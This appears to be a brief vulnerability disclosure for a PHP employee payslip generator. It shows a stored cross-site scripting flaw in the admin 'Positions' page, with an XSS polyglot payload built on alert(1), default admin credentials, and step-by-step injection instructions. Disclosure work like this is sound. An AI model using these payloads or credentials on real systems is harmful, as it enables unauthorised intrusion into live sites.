# Title: Employee Payslip - XSS Polyglots
# Author: @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html
# CVE: N/A
# XSS POLYGLOTS
# Screenshot : https://prnt.sc/eeUxgczBF-Gj
Used Payload :
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
Admin account :
admin
admin123
Method :
Connect to panel with admin acc : http://.../admin/
#Vulnerabîlity
1. After login with SUPER ADMIN, go to http://.../admin/?page=positions (Position List page)
2. "Create New" and add in "NAME" the payload : “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
3. After New Position created, click in the form for exec your payload XSS Polyglots
Enjoy !